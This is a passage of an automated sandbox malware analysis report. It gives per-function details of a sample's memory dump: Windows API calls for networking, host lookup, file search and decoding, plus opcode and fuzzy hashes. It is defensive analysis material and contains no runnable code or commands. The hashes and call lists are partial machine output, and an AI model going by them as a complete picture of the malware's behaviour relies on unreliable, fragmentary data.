                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C321A131A102188FCB00EFA8DC80E9A77F5FF8C304B148128E95597322FBB0A906CF95
                                                                                                                                                                                                                          Function 00418160 Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 138 418160-418182 InternetCloseHandle 139 418185 138->139
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetCloseHandle.WININET ref: 00418166
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandleInternet
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1081599783-0
                                                                                                                                                                                                                          • Opcode ID: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
                                                                                                                                                                                                                          • Instruction ID: ae5e315c54a7670b2249e5b0f3bdf6a6f2b00f65773975af1cbbced8fcde3caa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7601FB36B0522DDFDB00EF98EC80E9A73B4FF58218B114465E92597321EBB0AA16CF55
                                                                                                                                                                                                                          Function 00417F58 Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 145 417f58-417fa2 HttpSendRequestA 147 417fa9-417fcb 145->147
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HttpRequestSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 360639707-0
                                                                                                                                                                                                                          • Opcode ID: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                                                                          • Instruction ID: c5f7f24f37b68b0ee58fd2f50e06334a253e74aa66ac9acfdd0b5a5957e02501
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2601A470A102199FE760EF68DC84F5637B8AB8C700F01467CF715E72E2EAB09841CB15
                                                                                                                                                                                                                          Function 00431480 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 148 431480-4314c6 GetComputerNameA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000), ref: 004314B3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ComputerName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3545744682-0
                                                                                                                                                                                                                          • Opcode ID: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
                                                                                                                                                                                                                          • Instruction ID: fbecf42e50bf32649b0f86ce1194af764c2ba67d61e8489f1122926f9e73325e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669
                                                                                                                                                                                                                          Function 004010C6 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 154 4010c6-40110d VirtualAllocExNuma
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocNumaVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4233825816-0
                                                                                                                                                                                                                          • Opcode ID: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                                                                          • Instruction ID: d15b9f596ca57768b7915b5c70adcfe063bff0d2da7a8f47b6d44be3499abacb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FE09275A063508FD704FF7CDD8175933E0AF85605F05915CD884A7366EB30A99487C5
                                                                                                                                                                                                                          Function 00417E16 Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 156 417e16-417e67 InternetConnectA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConnectInternet
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3050416762-0
                                                                                                                                                                                                                          • Opcode ID: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                                                                          • Instruction ID: 39c588309585c59699f010394ec1bf5a852f07e64b85a41ba6658fda9e5a6e49
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F01C709097128FE314DF69D48066AB7F1BFC4646F14C62DE49497325EB709492CB46
                                                                                                                                                                                                                          Function 00401046 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                                                                          • Instruction ID: fde5f217f82ebe29c984b4a8bf476fe36905b452798d5d1b4171e59d2cf25e0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BE02232E453642BE214AB7CCC4896777DAAF85244B098628E840CB322FA21EE40C2C4
                                                                                                                                                                                                                          Function 004016EF Relevance: 1.3, APIs: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                          • Opcode ID: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                                                                          • Instruction ID: 0df1f5f79d30fcabe98c6cb3613603f4b5a0cecef6749fcbca2d7a1ce428ac3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D092317043158FC744CF59ECC4A8A77A6AF896163189568E009CB22ADA31ED92CA88

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 0041E359 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0041E42B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 1974802433-4000257214
                                                                                                                                                                                                                          • Opcode ID: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                                                                          • Instruction ID: 444d2139b4423df7e404c14bc0898a50738c756d6f3279185a54cc7c24eee840
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A2162B67001549FC704DF6CDDE0EA933B9EBC9604B084168E915E3362E6B4AE14CB59
                                                                                                                                                                                                                          Function 00420370 Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00420455
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                                                                          • Instruction ID: 09395c8a0eafa750aeaa3e373b0b01c6308d5a6badcce2baeb186db3cbc76868
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5314BB5702954AFD700DFACEC98E5D7BE5FF98300B044068E859D7361EAB8AE058B45
                                                                                                                                                                                                                          Function 0042498B Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00424A63
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                                                                          • Instruction ID: 12d9cbd333469b35ebce06d581e83ce10451d2d381d02456cf870b2c2c34d416
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA318BBA705104EFD708CB5CDE89E69B7F9EB893087045025E812D7360E6F5EE14CB55
                                                                                                                                                                                                                          Function 0041FC3B Relevance: 1.5, APIs: 1, Instructions: 35encryptionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FC8A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
